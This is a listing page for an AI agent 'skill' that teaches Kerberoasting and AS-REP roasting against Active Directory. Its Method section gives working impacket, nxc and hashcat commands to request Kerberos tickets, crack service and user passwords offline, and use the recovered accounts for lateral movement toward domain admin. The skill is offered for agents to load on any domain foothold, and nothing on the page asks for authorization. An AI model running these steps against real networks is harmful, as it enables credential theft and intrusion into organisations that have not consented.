Kerberoasting & AS-REP roasting
SkillAI & modelsKerberoasting & AS-REP roasting, request/crack Kerberos tickets to recover service/user passwords offline. Load with any domain foothold or valid domain creds, on "kerberoast", "AS-REP", SPNs, service accounts, ports 88/389. Signals: domain creds in hand, SPNs set, accounts with pre-auth disabled.
Instructions available. Your AI can read the instructions. Execution depends on the setup they require.
Account requirements not reviewed. Check the skill instructions before use; ahel provides instructions and does not run this skill.
Add ahel to your AI once: Claude, ChatGPT, Cursor, Claude Code or Codex. Then ask it to use this.
Then ask your AI: use the Kerberoasting & AS-REP roasting skill
What this skill tells your AI
The instructions your AI receives, as published by noorqureshi/sploitagent in skills/ad/ad-kerberoasting/SKILL.md and read by ahel’s review.
When it applies
You have valid domain credentials (kerberoasting) or just a username list (AS-REP). Both recover plaintext passwords offline by cracking Kerberos-issued material — no lockout risk.
Why it works
- Kerberoasting: any authenticated user can request a service ticket (TGS) for any account with an SPN; part of it is encrypted with the service account's password hash. Crack it offline.
- AS-REP roasting: accounts with "do not require Kerberos preauth" hand out an AS-REP encrypted with the user's key to anyone — no creds needed, just the username.
Method
- Kerberoast (need creds):
impacket-GetUserSPNs corp.local/user:pass -dc-ip DC -request(ornxc ldap DC -u user -p pass --kerberoasting out.txt). Service accounts are prime targets. - AS-REP roast (no creds needed):
impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -request— pulls hashes for pre-auth-disabled accounts. - Crack offline:
hashcat -m 13100(TGS) /-m 18200(AS-REP) withrockyou+ rules. - Use the creds: service accounts are often privileged → lateral movement / DA path
(
ad-pivot-arsenal,network-pivoting-tunneling).
Gotchas
- Offline cracking = no account lockout, but a weak-password dependency; strong passwords resist.
- Target high-value SPNs (SQL, web, admin service accounts) first.
- Clock skew breaks Kerberos — sync time to the DC (
ntpdate/faketime) if you get KRB_AP_ERR_SKEW.
Verify success
A cracked plaintext password for a domain account, then authenticated access with it.
References
impacket GetUserSPNs/GetNPUsers; hashcat modes 13100/18200; "Kerberoasting" (Harmj0y).
Signals
- GitHub stars
- 20
- Forks
- 7
- Last commit
- Sep 2026
Advanced
- Item type
- skill
- Key
ad-kerberoasting- Source
- github.com/noorqureshi/sploitagent
github.com/noorqureshi/sploitagent
More in AI & models
Skill · anthropics
More in AI & modelswayfinder
Skill · mattpocock
More in AI & modelswizard
Skill · mattpocock
More in AI & modelsalgorithmic-art
Skill · anthropics
More in AI & modelscode-review-and-quality
Skill · addyosmani
More in AI & modelsai-first-engineering
Skill · affaan-m
More in AI & models